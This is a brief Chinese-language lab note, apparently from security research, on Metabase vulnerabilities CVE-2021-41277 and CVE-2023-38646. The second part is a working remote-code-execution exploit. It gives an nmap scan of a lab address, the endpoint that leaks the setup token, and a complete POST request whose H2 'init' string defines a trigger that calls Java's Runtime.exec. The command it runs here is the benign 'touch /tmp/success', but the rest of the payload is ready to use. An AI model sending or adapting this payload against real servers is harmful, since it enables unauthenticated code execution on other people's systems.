(CVE-2021-41277)(CVE-2023-38646)

Metabase任意文件读取漏洞（CVE-2021-41277）

信息收集：nmap 192.168.85.130 -p 3000 -A

Metabase未授权JDBC远程代码执行漏洞（CVE-2023-38646）

payload：http://192.168.85.130:3000/api/session/properties

POST /api/setup/validate HTTP/1.1
Cache-Control: max-age=0
Content-Type: application/json

{"token": "bea59bf9-e296-4c5a-8320-268f5b39157d",
    "details":{ "is_on_demand": false, "is_full_sync": false,
        "is_sample": false, "cache_ttl": null, "refingerprint": false,
        "auto_run_queries": true, "schedules": {},
        "details":{"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
            "advanced-options": false,"ssl": true,
"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('touch /tmp/success')\u000A$$" }, "name": "an-sec-research-team", "engine": "h2"}}